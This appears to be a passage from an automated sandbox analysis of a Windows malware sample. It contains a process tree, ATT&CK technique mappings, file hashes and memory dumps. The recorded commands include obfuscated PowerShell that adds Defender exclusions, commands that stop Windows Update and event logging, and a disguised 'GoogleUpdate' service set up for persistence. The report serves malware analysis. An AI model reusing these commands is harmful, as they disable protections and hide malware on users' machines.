        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        6⤵
        
        PID:4120
    - - C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        5⤵
        Executes dropped EXE
        
        PID:4652
  - - C:\Users\Admin\AppData\Local\Temp\setup.exe
      "C:\Users\Admin\AppData\Local\Temp\setup.exe"
      4⤵
      Executes dropped EXE
      PID:4916
- - C:\Users\Admin\AppData\Local\Temp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    3⤵
    - Executes dropped EXE
    PID:768
- C:\Users\Admin\AppData\Local\Temp\setup.exe
  "C:\Users\Admin\AppData\Local\Temp\setup.exe"
  2⤵
  - Executes dropped EXE
  PID:4928
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:1344
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:4792
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4724
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:5244
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:6104
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:6084
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:1680
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:5360
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:5940
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:6488
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:5832
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
    3⤵
    - Launches sc.exe
    PID:6364
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:824
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:5840
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
    3⤵
    - Launches sc.exe
    PID:5844

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:7768

C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
1⤵
PID:4880
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
  2⤵
  PID:2908
- C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
  "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
  2⤵
  PID:5252
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
    3⤵
    PID:6664
- - C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
    "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
    3⤵
    PID:5732
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
      4⤵
      PID:6532
  - - C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
      "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
      4⤵
      PID:4300
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        5⤵
        
        PID:7080
    - - C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        5⤵
        
        PID:3920
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        6⤵
        
        PID:3416
      - C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        6⤵
        
        PID:7932
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        7⤵
        
        PID:6864
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        7⤵
        
        PID:7352
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        8⤵
        
        PID:7808
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        8⤵
        
        PID:7652
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        9⤵
        
        PID:7552
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        9⤵
        
        PID:8012
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        10⤵
        
        PID:7812
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        10⤵
        
        PID:7764
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        11⤵
        
        PID:7304
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        11⤵
        
        PID:944
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAaABhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHIAawB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHcAaABjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAdwBmACMAPgA="
        12⤵
        
        PID:7684
        
        C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Bootstrapper.exe"
        12⤵
        
        PID:5172
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        12⤵
        
        PID:7100
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        11⤵
        
        PID:3676
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        10⤵
        
        PID:3744
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        9⤵
        
        PID:612
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        8⤵
        
        PID:2904
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        
        PID:7416
      - C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        6⤵
        
        PID:1180
    - - C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        5⤵
        
        PID:7988
  - - C:\Users\Admin\AppData\Local\Temp\setup.exe
      "C:\Users\Admin\AppData\Local\Temp\setup.exe"
      4⤵
      PID:6168
- - C:\Users\Admin\AppData\Local\Temp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    3⤵
    PID:5220
- C:\Users\Admin\AppData\Local\Temp\setup.exe
  "C:\Users\Admin\AppData\Local\Temp\setup.exe"
  2⤵
  PID:7088

C:\ProgramData\Google\Chrome\updater.exe
C:\ProgramData\Google\Chrome\updater.exe
1⤵
PID:5432
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:6172

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\AdobeSFX.log
1⤵
- Opens file in notepad (likely ransom note)
PID:6260

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
3d086a433708053f9bf9523e1d87a4e8

SHA1
b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

SHA256
6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

SHA512
931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
124edf3ad57549a6e475f3bc4e6cfe51

SHA1
80f5187eeebb4a304e9caa0ce66fcd78c113d634

SHA256
638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675

SHA512
b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
ae389671b9a5c9c5ccd60620d0ba662d

SHA1
2d583be4316852cdf01c89acc70a34451dba6ae0

SHA256
e4de5f98a441d0b201a5e38cb2ec1910c5d3ce690c4477c6e95747b951fd63a7

SHA512
d4b3a7220607299a6b28acfdfedecb722dabc951ce53009e7cf81f7240b7404d65004ae7781d0506c827b9a3f9377acd957e326f64612c2568a2db102d9da3d7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
00f499ed9120b07038cb2a8f24ed9433

SHA1
e7f8e24ad915392e2614f4cd3012fc1a474bbbd4

SHA256
4b9990ce2339b7fa96e7acce7fa60e6a1679a86f452f6836a0aa5c623a4c4410

SHA512
01e708bdbf19671b203b2f0937cd8cb14036593182de545368bfd485d2f8a6f5b762ea30fb499a2686c16d2a762cead8c8b4ea974aac268c2c7c0acc35408007

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
91aa422de904aebeac5887bf88919f37

SHA1
66a004136ced6e851623c9b0cdce62f384d6f0c8

SHA256
7a3eff92d29332a6b5fc6fa76ceae846cc61ee2c21fd0e04b3b4f7fc2a9fa74a

SHA512
8dc97086b06baef0a2ef2a1108fd2cc08eea3d1e6d78b9b8db369db112449a061633416b07c191c494ecb4db9b09b64cb0ce8553b6f7abee6f583801f91f5f4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yelbcoem.3yv.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\setup.exe

Filesize
5.1MB

MD5
5bd377b8677903cc9ca9c42fc930560b

SHA1
aa6bae9a1c7fbdcd9a5bc1d2c0ad987081c5d92d

SHA256
2bccca5ca73369b2c6fdb53116e659b5651b1388d31a6fbccf97483c2665c756

SHA512
9e6d70cf4be6645f7c76f51ac89206bfd89f9dcc0a066e9a92ee4b0d1de280f840a024dbe7040145fb5a928a9c7ce40614542d1eee8ef3b18e60768572d8458e

Download Submit
memory/412-187-0x000000006FEA0000-0x000000006FEEC000-memory.dmp

Filesize
304KB

Download
memory/452-90-0x0000000006EA0000-0x0000000006EBE000-memory.dmp

Filesize
120KB

Download
memory/452-197-0x0000000007EF0000-0x0000000007F04000-memory.dmp

Filesize
80KB

Download
memory/452-80-0x000000006FEA0000-0x000000006FEEC000-memory.dmp

Filesize
304KB

Download
memory/452-91-0x0000000007B70000-0x0000000007C13000-memory.dmp

Filesize
652KB

Download
memory/452-121-0x00000000082E0000-0x000000000895A000-memory.dmp

Filesize
6.5MB

Download
memory/452-122-0x0000000007CA0000-0x0000000007CBA000-memory.dmp

Filesize
104KB

Download
memory/452-57-0x0000000006EF0000-0x0000000006F3C000-memory.dmp

Filesize
304KB

Download
memory/452-55-0x0000000006950000-0x000000000696E000-memory.dmp

Filesize
120KB

Download
memory/452-79-0x0000000007930000-0x0000000007962000-memory.dmp

Filesize
200KB

Download
memory/452-133-0x0000000007D20000-0x0000000007D2A000-memory.dmp

Filesize
40KB

Download
memory/452-135-0x0000000007F20000-0x0000000007FB6000-memory.dmp

Filesize
600KB

Download
memory/452-13-0x0000000005980000-0x00000000059A2000-memory.dmp

Filesize
136KB

Download
memory/452-14-0x0000000006160000-0x00000000061C6000-memory.dmp

Filesize
408KB

Download
memory/452-165-0x0000000007EA0000-0x0000000007EB1000-memory.dmp

Filesize
68KB

Download
memory/452-176-0x0000000007EE0000-0x0000000007EEE000-memory.dmp

Filesize
56KB

Download
memory/452-22-0x0000000006310000-0x0000000006664000-memory.dmp

Filesize
3.3MB

Download
memory/452-15-0x00000000061E0000-0x0000000006246000-memory.dmp

Filesize
408KB

Download
memory/452-208-0x0000000007FE0000-0x0000000007FFA000-memory.dmp

Filesize
104KB

Download
memory/732-271-0x000000006FEA0000-0x000000006FEEC000-memory.dmp

Filesize
304KB

Download
memory/1016-312-0x000000006FEA0000-0x000000006FEEC000-memory.dmp

Filesize
304KB

Download
memory/1224-155-0x000000006FEA0000-0x000000006FEEC000-memory.dmp

Filesize
304KB

Download
memory/1652-198-0x000000006FEA0000-0x000000006FEEC000-memory.dmp

Filesize
304KB

Download
memory/3080-251-0x000000006FEA0000-0x000000006FEEC000-memory.dmp

Filesize
304KB

Download
memory/3188-145-0x000000006FEA0000-0x000000006FEEC000-memory.dmp

Filesize
304KB

Download
memory/3400-394-0x000000006FEA0000-0x000000006FEEC000-memory.dmp

Filesize
304KB

Download
memory/3852-361-0x000000006FEA0000-0x000000006FEEC000-memory.dmp

Filesize
304KB

Download
memory/3932-123-0x000000006FEA0000-0x000000006FEEC000-memory.dmp

Filesize
304KB

Download
memory/4464-341-0x000000006FEA0000-0x000000006FEEC000-memory.dmp

Filesize
304KB

Download
memory/4720-301-0x000000006FEA0000-0x000000006FEEC000-memory.dmp

Filesize
304KB

Download
memory/4736-383-0x000000006FEA0000-0x000000006FEEC000-memory.dmp

Filesize
304KB

Download
memory/4876-102-0x000000006FEA0000-0x000000006FEEC000-memory.dmp

Filesize
304KB

Download
memory/4876-210-0x0000000007AD0000-0x0000000007AD8000-memory.dmp

Filesize
32KB

Download
memory/4876-8-0x000000007358E000-0x000000007358F000-memory.dmp

Filesize
4KB

Download
memory/4876-9-0x0000000004F50000-0x0000000004F86000-memory.dmp

Filesize
216KB

Download
memory/4876-241-0x000000007358E000-0x000000007358F000-memory.dmp

Filesize
4KB

Download
memory/4876-10-0x0000000005700000-0x0000000005D28000-memory.dmp

Filesize
6.2MB

Download
memory/5020-230-0x000000006FEA0000-0x000000006FEEC000-memory.dmp

Filesize
304KB

Download
memory/6108-480-0x000002039D010000-0x000002039D02C000-memory.dmp

Filesize
112KB

Download
memory/6108-530-0x000002039D0F0000-0x000002039D0FA000-memory.dmp

Filesize
40KB

Download
memory/6108-541-0x000002039D290000-0x000002039D2AA000-memory.dmp

Filesize
104KB

Download
memory/6108-543-0x000002039D100000-0x000002039D108000-memory.dmp

Filesize
32KB

Download
memory/6108-544-0x000002039D110000-0x000002039D116000-memory.dmp

Filesize
24KB

Download
memory/6108-545-0x000002039D2B0000-0x000002039D2BA000-memory.dmp

Filesize
40KB

Download
memory/6108-506-0x000002039D270000-0x000002039D28C000-memory.dmp

Filesize
112KB

Download
memory/6108-494-0x000002039D000000-0x000002039D00A000-memory.dmp

Filesize
40KB

Download
memory/6108-490-0x000002039D030000-0x000002039D0E5000-memory.dmp

Filesize
724KB

Download
memory/6108-427-0x000002039CD80000-0x000002039CDA2000-memory.dmp

Filesize
136KB

Download
memory/6172-1136-0x0000022E41200000-0x0000022E412B5000-memory.dmp

Filesize
724KB

Download